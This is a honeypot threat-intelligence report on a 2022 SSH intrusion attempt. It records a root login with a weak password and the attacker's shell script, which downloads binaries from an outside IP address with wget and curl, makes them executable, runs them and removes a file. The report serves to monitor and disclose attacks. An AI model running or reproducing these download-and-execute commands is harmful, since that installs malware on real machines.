Attack Report for Observation

Header

Time

2022/06/14, 16:12:54 (GMT)

Transaction ID

IPFIGMUUA4AYPJMG

Service

ssh

Location

CN (China)

Attacker

218.92.0.158

Classification

Command execution

Harm Potential

Medium

Description

System command execution attempt

Content

218.92.0.158 client username 'root' and password '0123' entered
218.92.0.158 client command : '#!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://113.160.100.172/scripts/23s
curl -O http://113.160.100.172/scripts/23s
chmod +x 23s
./23s
wget http://113.160.100.172/scripts/23
curl -O http://113.160.100.172/scripts/23
chmod +x 23
./23
rm -rf 23.sh'

All observations are coming from honeypot central database.

Please share your wishes, opinions and suggestions with us:

If you like, you can support
with your donations to us..

Donate